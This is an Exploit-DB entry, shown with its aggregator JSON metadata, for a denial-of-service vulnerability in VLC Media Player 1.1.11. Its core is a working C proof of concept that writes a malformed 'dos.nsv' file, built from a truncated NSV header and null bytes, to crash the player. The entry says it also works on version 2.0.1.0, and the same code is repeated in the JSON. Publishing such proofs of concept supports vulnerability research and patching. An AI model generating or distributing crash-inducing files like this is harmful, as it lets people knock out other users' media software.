VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability
2012-03-14T00:00:00
ID EDB-ID:38939 Type exploitdb Reporter Dan Fosco Modified 2012-03-14T00:00:00
Description
VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability. Dos exploits for multiple platform
source: http://www.securityfocus.com/bid/64623/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main()
{
FILE *f;
f = fopen("dos.nsv", "w");
fputs("\x4e\x53\x56\x66", f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fclose(f);
return 0;
}
//use code for creating malicious file
edit: works on 2.0.1.0
{"id": "EDB-ID:38939", "hash": "6ba957501776c8cce979045df86574cf", "type": "exploitdb", "bulletinFamily": "exploit", "title": "VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability", "description": "VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability. Dos exploits for multiple platform", "published": "2012-03-14T00:00:00", "modified": "2012-03-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/38939/", "reporter": "Dan Fosco", "references": [], "cvelist": [], "lastseen": "2016-02-04T09:10:05", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-02-04T09:10:05"}, "dependencies": {"references": [], "modified": "2016-02-04T09:10:05"}, "vulnersScore": -0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/38939/", "sourceData": "source: http://www.securityfocus.com/bid/64623/info\r\n\r\nVLC Media Player is prone to a denial-of-service vulnerability.\r\n\r\nSuccessful exploits may allow attackers to crash the affected application, denying service to legitimate users.\r\n\r\nVLC Media Player 1.1.11 is vulnerable; other versions may also be affected. \r\n\r\n# Exploit Title: VLC v. 1.1.11 .nsv DOS\r\n# Date: 3/14/2012\r\n# Author: Dan Fosco\r\n# Vendor or Software Link: www.videolan.org\r\n# Version: 1.1.11\r\n# Category: local\r\n# Google dork: n/a\r\n# Tested on: Windows XP SP3 (64-bit)\r\n# Demo site: n/a\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n\tFILE *f;\r\n\tf = fopen(\"dos.nsv\", \"w\");\r\n\tfputs(\"\\x4e\\x53\\x56\\x66\", f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\n//use code for creating malicious file\r\n\r\nedit: works on 2.0.1.0\r\n\r\n\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
